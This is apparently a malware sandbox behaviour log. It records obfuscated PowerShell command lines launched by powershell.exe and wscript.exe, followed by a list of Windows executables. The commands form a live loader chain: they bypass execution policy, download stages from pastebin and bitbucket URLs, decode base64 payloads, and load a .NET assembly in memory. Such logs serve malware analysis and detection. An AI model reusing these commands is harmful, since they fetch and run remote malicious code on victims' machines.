parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\dll03.ps1
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener2.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
parent_process wscript.exe martian_process powershell.exe $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe